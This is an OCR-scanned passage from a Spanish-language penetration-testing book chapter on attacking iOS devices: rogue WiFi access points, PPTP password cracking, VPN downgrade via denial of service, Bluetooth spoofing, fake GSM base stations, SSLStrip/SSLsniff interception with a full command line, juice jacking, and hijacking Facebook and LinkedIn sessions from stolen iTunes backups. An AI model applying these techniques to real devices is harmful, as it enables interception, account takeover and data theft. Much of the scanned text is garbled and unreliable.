а una red WiFi. Por defecto, en el momento en que un terminal con sistema operativo ¡OS tiene 
configurada como “activa” la conexión WiFi, el dispositivo intentará conectarse a una red conocida, 


Este comportamiento no se puede cambiar, es decir, en el momento en que esté activada la conexión 
WiFi el dispositivo buscará una red conocida y se conectará а ella. Esta política de conexión a r edes 
conocidas es bastante contusa y tiene unos fallos en cuanto a política que merece la pena resaltar. 


Muchos usyarios confunden el selector que aparece debajo de la lista de redes WiFi con un selector 
booleano de conexión automálica, pero esto no es así. Este selector sólo tiene utilidad cuando no 
hay una red conocida cerca, en caso de que sí hubiera dicha red, el terminal se conectaría siempre 
s 2 $ an 
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SE ы Бараа SO posta SAR FA ЕРЕСИ 


ш 
ceder a ina red nueva, 


үк, 


Fig 8.17: Соп el selector encéndido se conectará automáticamente a las redes conocidas. 


Sólo en el caso de que no exista una red conocida en las proximidades, el dispositivo optará por 
dos políticas. La primera de ellas mostrará, mediante un cuadro de: dialogo de notificación que 
saldrá por encima de cualquier aplicación que esté activa en ese instante, la lista de las redes en las 
proximidades, para que el usuario seleccione la que desea utilizar, En el caso de que no esté activo 
ese selector, el usuario deberá situarse en el panel correspondiente а la configuración de redes WiFi, 
y seleccionarla manualmente en el módulo relacionado con los ajustes. 


El problema que se plantea a continuación es saber qué redes son las que un dispositivo WiFi tiene 
almacenadas en un determinado instante como conocidas, ya que el sistema operativo ¡OS no las 
muestra. Esta lista de redes se almacena un fichero en formato SQLite que se encuentra en la ruta / 
private/var/Keychains/keychain-2.db, pero desde el interfaz gráfico es imposible consultarlo. 


En dispositivos con jailbreak es posible acceder a este fichero e investigarlo para conocer la lista de 
redes existentes. Además, para consultar dicha lista junto con las contraseñas de conexión es posible 
utilizar alguna herramienta como WiFi Passwords. 


El problema no es sólo que se conectará a una red conocida y que el usuario по sabe cuáles son 
estas, sino que tampoco es posible deshacerse de las redes conocidas con facilidad, уа que ¿Os 
sólo permite borrar una red de este tipo si está en las proximidades, en caso contrario, 10.68 posible 
eliminarlas de 1а lista, lo que obliga a modificar manualmente el fichero keychain- dl: Todo: esto 
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implica que puede haber una red conocida, a la que el dispositivo fue conectado alguna vez, y la 
próxima vez que la encuentre se conectará. i 


¿Cuál es la política de elección de red a la hora de realizar una conexión? Tras hacer múltiples 
pruebas, parece que los dispositivos con ¡OS, еп el caso de que haya más de una red Wili conocida 
en las proximidades, el terminal elije la última red a la que haya sido conectado, es decir, parecen 
utilizar un sistema de elección LiFO (Last In First Ош). | 


Dicho todo esto, para preparar un ataque de Rogue WiFi, а un atacante lo que le hace falta es saber 
cómo el terminal reconoce una red WiFi, para intentar que se conecte a él mismo, y tal y cómo 
funcionan, hay una ventaja que puede utilizar el pentester. Los dispositivos ¡OS utilizan еї 5510, es 
decir, el nombre de la red WiFi, y la tecnología, es decir, el protocolo de cifrado y la contraseña de 
conexión para reconocer una red y conectarse a ella, 


Esto es un problema sério, ya que debería utilizarse el ESSID (Extended SSID) para reconocer la геп, 
y no sólo el nombre. Este ESSID tiene la estructura de una dirección MAC, y strve para comprobar 
si se está conectando al Access Point correcto, o éste ha sido cambiado. En redes de un solo punto 
de acceso, este valor es la MAC del router, pero en redes con roaming es una dirección МАС virtual 
compartida por todos. 


Como el terminal ¡OS no valida el ESSID sino el SSTD, puede lograrse fácilmente que el dispositivo 
se conecte a una falsa red, sólo porque tenga el mismo nombre у la misma configuración. Todo 
este funcionamiento descrito puede llevar a serios riesgos de seguridad, que pueden ser dirigidos o 
aleatorios, dependiendo de la estrategia del atacante. 


Supongase una conferencia, un aeropuerto o cualquier lugar con concentración de personas en las 
que puedan existir terminales Apple con sistema operativo iOS. Es probable que muchos de ellos 
se hayan conectado alguna vez а una red WiFi abierta, llamada Default, Free o Public. Todos esos 
nombres son muy comunes en espacios públicos u hoteles, por Jo que es probable que muchos 
usuarios tengan esa red en su lista de redes conocidas. Si no hay otra red conocida cerca, esos 
dispositivos se conectarán automáticamente e intentarán enviar y recibir datos todas las aplicaciones, 
que podrían ser interceptadas por el atacante que haya puesto el punto de acceso WiFi falso. 


Este mismo ataque puede ser hecho de forma dirigida, por ejemplo, entre los compañeros de una 
empresa, o de establecimientos, como cafeterías, restaurantes, hoteles. Supongamos un entorno en 
el que todos los miembros conocen la contraseña de Ја red WiFi. Si uno de ellos quisiera atacar a 
otro, podría replicar la red WiFi que ambos conocen en otro entorno, donde la víctima no espere que 
exista esta red, haciendo que el dispositivo se conecte automáticamente a este falso punto de acceso. 


Si el ataque es dirigido, utilizando los módulos de Metasploit dentro de un termina! iOS, es posible 
acompañar a la víctima e ir charlando con ella mientras nuestros Rogue AP instalado en nuestro 
iPhone le ofrece en todo momento la conexión a Internet al iPhone de la víctima mediante una 
red WiFi Public, El terminal de la víctima se descargará el correo electrónico, los mensajes de 
Whatsapp, etc... a través del Rogue AP. 
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Atacar las comunicaciones VPN de iOS 

Una de las protecciones que tienen los usuarios de ¡Phone о iPad, es la de conectarse a Internet, 
por medio de una VPN, ya que así, si las comunicaciones son interceptadas, estas no podrán se 
descifradas. Sin embargo, las redes VPN en 105 pueden ser atacadas de alguna forma, tal y como E 
muestra a continuación. ыт 


La primera de las maneras es aprovecharse de los fallos de seguridad descubiertos en el protocol 
PPTP (Point to Point Tunneling Protocol). A día de hoy, si un usuario se conecta a su servidor УР 

a través de un Rogue АР que está grabando todo el tráfico, es posible crackear la contraseña. Esto е 
así debido a las nuevas vulnerabilidades conocidas en la arquitectura PPTP y a que además PPTP n 
autentica máquinas, con lo cual es posible enrutar el tráfico de una VPN con esta tecnología a través 
de una máquina de grabación que capture:todo el tráfico. 
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hash bytes: 6634 
NT hash: 209c6174da400ca0b422f3f059790634 
password; admin алан. чур 


rootábt:/pentest/vireless/asleapt |] 


1 
La segunda de las características débiles del sistema VPN de ¡OS es que el terminal, si pierde 


conexión a través de la VPN no avisa al usuario, y continúa enviando tráfico sin cifrar, es decir, sin” 
utilizar la VPN. Si el objetivo está utilizando un sistema de conexión УРМ robusto, сото L2TPY/; 
IPSec, entonces hay que intentar aprovechar esta circunstancia. A. esta característica es posible 

sacarle partido haciendo un D.O.S. al servidor VPN para que se caiga la conexión con el cliente, у` 
luego continuar capturando el tráfico a través del sniffer, esta vez sin cifrar, ; i 


ME 


Atacar las comunicaciones BlueTooth de un iOS i 
Las comunicaciones BlueTooth son muy comunes en dispositivos de cercanía. En el mundo de los ; 
terminales iPhone о iPad, son comúnmente utilizados con sistemas de telefonia manos libres, o 
teclados. El fallo en los terminales ¡OS es que de fábrica, la gran mayoría de modelos de ¡Phone y de ' 
Pad tienen la dirección BlueTooth consecutiva de la dirección de la tarjeta WiFi. 


La dirección de la tarjeta WiFi se difunde sin ningún tipo de precaución, ya que en teoría sólo sirve 
para indicar la dirección del terminal. Sin embargo, la dirección BlueTooth se utiliza como validador 
estático, una vez que dos dispositivos BlueTooth han sido етрагејайоѕ. Por ejemplo, el terminal 
iPhone y el sistema manos libres del coche. | 


Si el usuario ha enlazado esos dos elementos, un atacante sólo necesitaría saber cuál es la dirección 
BlueTooth del iPhone para suplantarla en cualquier otro dispositivo BlueTooth y conectarse а! 
sistema de manos libres sin ningún tipo de código. 
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Atacar las comunicaciones 3G o GPRS de iOS 


Una de las formas más habituales que tienen los usuarios de evitar problemas con posibles atacantes 
cercanos es trabajar con sólo la conexión GPRS o 3С. Si el objetivo está trabajando con una conexión 
За o GPRS estará a salvo de los ataques WiFi. Sin embargo, si по ha desactivado la tarjeta WiFi, un 
atacante podría aprovecharse del diseño de conexión automática para crear un Rogue AP al que se 
conecte el lerminal, Si un dispositivo ¡OS tiene WiFi, 3G у GRPS, se conectará primero por la WiFi, 
y luego por 3G/GPRS, por lo que sin avisar al usuario comenzará a enviar el tráfico por el Rogue AP, 


Si el usuario ha sido suficientemente precavido de desactivar la WiFi, que hace que se ahorre 
batería, que no sea posible detectarle por el espectro inalámbrico y que no se exponga su dirección 
BlueTooth, lo único que se puede hacer es un ataque con una estación BTS falsa. 


533 


Este tipo de ataques está descrito correctamente en el libro de “Hacking de Comunicaciones Móviles: 
GSM/EDGE/GPRS” de David y José, pero básicamente se aprovecha de que una antena de telefonía 
cercana de gran potencia, puede anular a las de las operadoras de telefonía móvil cercanas y hacer 
que el terminal se conecte a la antena falsa, en lugar de a la operadora real. 


Fig 8.20: Estructura de ataque man in the middle a comunicaciones GPRS con una BTS falsas, 
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A diferencia de las redes 3G, la única validación que hace el terminal a una red GPRS antes de 
conectarse es la del nombre, lo que para un atacante suplantar la red de la operadora del iPhone es 
tan sencillo como poner el mismo nombre. Algunos teléfonos permiten bloquear el uso de redes 
GPRS, pero en el caso de ¡OS no hay forma de forzar el uso sólo de redes 3G, lo que siempre deja 
abierta esta puerta al atacante. | 


Una vez que se haya conseguido la conexión a la red falsa GPRS, el atacante puede manipular 
tanto el tráfico de voz como de datos, haciendo ataques de man іл the middle en GRPS como de 
suplantación de números de llamadas telefónicas. 


Ataques man in the middle en ¡OS 
Hasta el momento, muchos de los ataques descritos hacen referencia a un esquema de man in the 
middle en terminales ¡OS, lo que podría ser un esquema válido para robar Información y manipular 
datos. 


En el caso de conexiones sin cifrar, ya sean Http (conexiones a webs o webservices), es posible 
conseguir mucha información de apps usadas por el cliente o el mismo navegador. Además una de 
las formas más sencillas de alargar el control de un iPhone sin meter un malware ni tener problemas 
con las protecciones de code-signing en iOS consiste en usar Bofneís en Javascript. 


Este tipo de botnels se aprovechan del esquema de hombre en medio para meter un payload en 
todos los ficheros Javascript que carga una página web que se va a conectar a un panel de control 
para recibir órdenes desde él. La víctima quedará infectada mientras que no se borre la caché del 
navegador, y el atacante podrá robar las pulsaciones de teclado, hacer ataques de phishing o robar 
las cookies de sesión de todo lo que pase en el navegador. | 


Uno de los problemas que surgen en este esquema de hombre en medio es la existencia de conexiones 
web con Http-s, que puedan evitar la interceptación de todo el tráfico, ya sea para manipular ficheros 
Javascript o para interceptar comunicaciones de cualquier aplicación. 


Sin embargo se pueden probar dos ataques distintos: SS£LStrip у SSESniff, ambos publicados por el 
investigador Moxie Malinspike. El primero de ellos es muy conocido, y su objetivo es entregar la 
página en HTTP a la víctima y ser el atacante el que se conecta a la web en HTTPS. Es decir, engaña 
al usuario quitando HTTPS de todas las conexiones. Si el usuario no se percata о la web está mal 
diseñada es muy fácil conseguir que una víctima introduzca datos en los formularios. 


El segundo de los ataques se basa en una vulnerabilidad que fue parcheada en ¡OS 4.3.5 con la 
validación de los certificados digitales. Este bug tiene 10 años y Apple cayó en él hasta la citada 
versión, El atacante utilizará un certificado digital correcto, pero no autorizado para generar nuevos 
certificados, para generar certificados digitales falsos. Si el cliente no valida las BasicConstraints, es 
decir, las limitaciones que tiene el certificado utilizado, no se dará cuenta de que se está usando un 
certificado digital no autorizado para generar nuevos certificados. Si el navegador de la víctima es 
inferior a ¡OS 4.3.5, se puede utilizar SSLSniff para hacer este ataque con cualquier certificado válido 
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y no se mostrará ninguna alerta, El comando de SSLsniff que hay que utilizar para las versiones de 
¡OS vulnerables es: 


sslsniff -a -c [path/to/your/certificate] -f ios -h [httpport] -s [sslport] -w 
iphone. loq 


Si el termina! tiene la versión ¿OS 4.3.5, entonces no se pueden utilizar esos certificados, pero si 
eres capaz de conseguir los certificados falsos que el hacker iraní se creo en Diginotar para Google, 
Hotmail, etcétera, podrás utilizarlos para ataques man іп the middle, уа que el usuario no puede 
revocar las Entidades de confianza manualmente, y fue en ¡OS 5 cuando Apple los revocó. Estos 
circularon por zonas menos claras de Internet, ; 


Por otro lado, si se usa un certificado falso, el navegador generará una alerta, pero esto no tiene que 
ser siempre así en todas las aplicaciones. Por ejemplo, la herramienta Paypal рага iOS, en el año 
2011 no detectaba el uso de un certificado falso en la comunicación, y enviaba datos a través de esa 
concxión, algo que tuvo que solucionar. 


Ataques de Juice Jacking a iOS 

Una de los problemas que tiene ¡OS es que las tarjetas de memoria no se cifran con el sistema 
¡Phone Data Protection, con lo que es posible extraer fotos, notas y videos almacenados en ellas, Un 
atacante podría, simulando un cargador de batería en un punto clave, o unos altavoces en un hotel, 
robar los datos de los teléfonos que en él se pinchen, ya que se puede configurar como un disco USB. 
ste tipo de ataques también se pueden hacer con acceso fisico al dispositivo, pero si puedes lleyar 
al terminal, lo mejor es correr con él y sacarle todos los datos en el laboratorio. 


a ogh gi 
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ALA AES 


Fig 8.21: Los altavoces en las habitaciones de hotel son perfectos para ataques de Juice Jacking 


Un atacante podría, simulando un cargador de batería en un punto clave, o unos altavoces en un 
hotel, robar los datos de los teléfonos que en él se pinchen, ya que se puede configurar como un disco 
USB. Este tipo de ataques también se pueden hacer con acceso físico al dispositivo, pero si se puede 
llegar al terminal, lo mejor es correr con él y sacarle todos los datos en el laboratorio. 
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Post-Explotación: Ataque al backup-de un terminal ¡OS ` 


Los backups de un terminal iOS son muy jugosos desde el punto de vista de un atacante. En ellos 
se encuentran no sólo datos de las aplicaciones, sino contraseñas de redes WiFi, VPN, cuentas E 
correo electrónico, etcétera. El número de contraseñas almacenadas en el keychain o Чауего de u 
iPhone o un iPad es muy alto, En el documento publicado por Apple, titulado ¡OS Security Guide 
es posible ver la lista de contraseñas almacenadas en el dispositivo que estarían al descubierto si «Ж 
accediese a los datos de un backup. 


Item Accessible 


om ll де pi A O CAE A ds id dh ч, муа 


O эра абава Анасы лаада Лс сетте 


М-Н passwords After first unlock 


per o е палем наан nthini Я a 
IAN AAA ats Ne Lg anin d PO IU Or a oc dei ы LEAR AAA LAA dr = o mA йшнде Бйз, ал lo e pl IL ARA 


Mail accounts After first unloc 


НИНИ мул э mo. тале э. 
mes e A A бар A API IA AB SR a he te 


Exchange accounts After first unlock 
учы с A боб A Т ар Жи га дине сҮ A AA = ii A 


с ЖЕ ИН Alu noremigratay 


VPN passwords After first unlock 


m nmaa n АМ жечу тр; , TRA ann e 
O ETEN PERAN EEEE зеза Улу DAE EEEE a AAE NT EIEE A рү чөт, E у ун үа A RN монан inini pripisa ae бург, 


LDAP, CalDAV, CardDAV iter first unlock 

Tunes. backup ы: When unlocked, non-migratory | 
Voicemail А Always 2 
a A E A ы шшс ын 
Safari passwords | When unlocked 


mmama mam n rui aamen 


ы 


y 


Bluetooth keys | Always, nan-migratory 


а a pa 


| Apple Push Notification Service Токе . Always, non-migratory 


¡TO aannaaien 


¡Cloud certificates and private key Always, nan-migratory 


cr 


A (ri а al pr ob a ri pi 


¡Message keys Always, non-mijgratory 


A рен. IA Verlo ld ʻ ә 
өс ld ey ды A a ea enanada lr iy po rr а 


Certificates and private keys installed by Configuration Profile Always, nan-migratory 


de y Үү MESME Mt iaaeaie rmen Bareng AA AAA nl lia el ШЫ Bac cdo bi alt A 


SIM PIN Always, nan-migratory 
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Fig 8.22: Contraseñas almacenas en el keychain de 108 


Además, aunque muchas aplicaciones no almacenen 1а$ contraseñas de manera insegura.en el 
terminal, en muchos casos es posible acceder a cookies de sesiones abiertas que abren la puerta de 
aplicaciones populares como Facebook, Linkedin o Dropbox, lo que permitiría hacer un robo de la ` 
cuenta, simplemente con acceder a esos datos en el backup. E 


Por ejemplo, en el caso de Facebook y Linkedin, sólo hay que buscar los ficheros que se encuentran. 
en estas rutas, copiarlos, y pegarlos en esa misma ubicación de un dispositivo con jailbreak donde 
esté instalado Facebook o Linkedin,.y acceder a la cuenta del dueño del backup. КЕ: 


- — [Linkedinj/Cookies/Cookies.binarycookies 


Linkedin]/Preferences/com.linkedin.Linkedin.plist 


[ 
[Facebook]/Cookies/Cookies.binarycookies 
[ 


Facebook]/Preferences/com.linkedin.Linkedin.plist 
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Fig › 8.23: Copiando E ña de тк aplicación Linkedin de un 105 


Conocida la importancia de los datos de un bakcup de iOS, en Metasploit se añadió un módulo de 
postexplotación para extraer desde una sesión los ficheros de un backup de ип terminal ¡OS en un 
sistema operativo comprometido. Cuando se ejecuta el módulo apple_ios_ backup, éste vaa buscar 
en los directorios por defecto de Apple iTunes sì existe algún backup de usuario y si no es asi 
devolverá un mensaje de “No users found with an ¡Tunes backup directory”. 


| с ЖОП , 
Estos backups se guardan por defecto en las siguientes rutas, pero hay que tener en cuenta que el 
usuario puede decidir cambiar la ubicación de las mismas, lo que implicaría realizar una búsqueda 
manual de dichos backups en el sistema, algo que puede ser tedioso, pero más que recomendable. 


Sistema Operativo Ubicación del backup: EA : : ч 
А Documents апа Setting ¿Usuario [Mpplication DataMpplec утриегүм «ТТЛ В; 


”Мһгагу/Аррїїсайоп Support/MobileSync/Backup 
erlUstacio]VAppDa ta Moaming Apple Computer Mobiié 


Fig 8.24: Rutas donde se almacena localmente los backups de ¡OS en Windows y OS X 


Si el backup es de una versión hasta ¡OS 4.x, entonces se puede utilizar el módulo de post-explotación 
de post/multi/gather/fapple_ios_backupapple_¡os_backup que viene en el repositorio de Meiasploil. 
Sin embargo, si existe un backup pero es de versión ¡OS 5.X entonces dará una excepción y no 
extraerá ningún fichero. Para solucionarlo, se ha parcheado el módulo para que cs también 
con los backups de ¡OS 5, y para que esto sea así hay que descargar los ficheros del módulo adaptado 
y situarlos como sigue: 

- Descargar apple_¡os_backup.rb desde la dirección htrp://securitylearn.nelhwp-content/ 

uploads/tools/msflapple_ios_backup.rb y ponerlo en el directorio: lopt/metasploit/ms/3/ 

modules/post/multi/gather/ 


- Descargar apple backup_manifestdb.rb desde la dirección http://securitylearn.net/ 


wp-content/uploads/tools/msflapple_backup_manifestdb.rb y ponerlo en el directorio /opt/ 


metasploii/msf3/lib/rex/parser/ 


. B ле 1. M j > + > a 1 
Cuando el módulo encuentra un backup de Apple iTunes, extrae todos los ficheros y los sitúa en а 
ruta ~/.msf4/laot/ como ficheros de base de datos .db. Sin embargo, si el backup del usuario está 
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cifrado todos los ficheros serán volcados de manera cifrada, por lo que si se quieren ex traer los datos 
primero se debe crackear el backup de iTunes. 


Es por ello que si tras hacer la extracción de algunos ficheros, estos aparecen cifrados, lo A es 
voicar el backup completo, que pude tener varios Gigabytes de tamaño, y procesarlo en local. S 
tiene contraseña de Apple iTunes, es decir, una password generada por la aplicación тина) рага ў 
copia de seguridad, primero habría que utilizar alguna herramienta como /G $ Password Recovery 
Suite. Este es un proceso lento, así que si los datos son de vital importancia es posible que sea 
necesaria la ayuda de algún sistema de cracking de passwords distribuido. 


Н 


і 
O O ТАНК ЫЫ 
Е а Berry 5. 5,х а 6. х Тее 
+ Truecrypt volumes ( fimited support ); 
* WPAJWPA2 handshakes, 
You can find тоге information about this program al developer's website, 
Май features are: 


• Support for wide range of GPUs - NVIDIA and AMD ones; 

+ УУРА-РЫК generator mode сап be used to create precompute tables for known 55105 making further attacks much 
aster; 

+ Several types ot attacks supported - brute-force and dictionary based ones; 

+ Automated password recovery with predefinedfuser-defined scenarios; 

+ User-defined sets of rules for dictionary attacks; 

+ Supports Unicode and ANSI dictionaries, 


File: C:JUserslar amasfiAppDatalRoaminalácole 
ComputerthokileSynci 
Туре: Арр 105 4, Хб. x а 
Pretection: Apple Ю5 4.х/5.х backup, PEKDF2/AES 
ү Toa ален to process: 186. з 979 


А 
гре 


і 
E e Low jevel hand written assembler CPU optimizations with all modern intruction sets support (AYX, ХОР, AES- те 


31а6577339275514е9180552се8031а2е0544 


Fig 8.25: етта la password dE un backup de ión: con a IGPRS 


Una vez que el backup esté descifrado, el siguiente paso sería averiguar el passcode del usuario 
con el que están cifrados los datos del mismo. Para ello se pueden utilizar las herramientas de 
iphone-dataprotection que ayudarán a crackear el passcode y a volcar el keychain del backup. 


Dichas herramientas están disponibles en la siguiente dirección: ht1p://code. google.com/p/iphone- 
dataprotection/ 


Esto también puede hacerse con herramientas comerciales сото Elcomsofi Phone Password 
Breaker, Con las herramientas de £lcomSofi по sólo se rompe el passcode y es posible ver todos los 
ficheros del backup, sino que en la última versión, tras sacar la contraseña del Apple ID del keychain, 

se conectan a Apple лош para analizar el backup constantemente, 
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“ig 8. ы Е сото! а analiza los Decade de iOS en iCloud 


Este proceso permitiría a un atacante descargar los cambios en ¿Cloud mientras el dueño de! terminal 
¡OS no sabe ni que ha sido vulnerado, ya que el backup se hace automáticamente en la nube y el 
atacante es allí donde lo analiza, 


4. Conclusiones 


En este capítulo se han presentado los puntos débiles de la arquitectura de los dispositivos Apple 
con sistema operativo 105. Como se ha podido ver, Metasploit no dispone de muchas herramientas 
para poder atacar estos sistemas operativos (sólo cuenta con un módulo de postexplotación para 
buscar backups de ¡OS y no está muy perfeccionado). Además el número de exploits públicos es muy 
pequeño para el sistema operativo, y no muy alto para las aplicaciones que vienen de serie. 


‚ Sin embargo, la arquitectura de este sistema operativo deja espacios de ataque a las comunicaciones 
М, GPRS, VPNs, BlueTooth, Mail o Sistemas SMS que, haciendo uso de los módulos de 
Metasploit pueden ser atacadas desde el framework, 


Por otro lado hay que tener presente que, a diferencia de Android donde no es posible instalar 
Metasploit de forma nativa y hay que meter una distribución Linux en el terminal, en los equipos 
¡OS con jailbreak sí que se puede utilizar tanto el framework de Metasploit, como S.E.T. e incluso 
Fast-Track, lo que ayudaría a un pentester a atacar las oficinas in situ. 


Además, muchos usuarios de ¡OS realizan un proceso de jailbreak o son descuidados con el lugar en 
el cual conectan sus dispositivos, por lo que es posible diseñar malware a medida o realizar ataques 


de JuiceJacking. 
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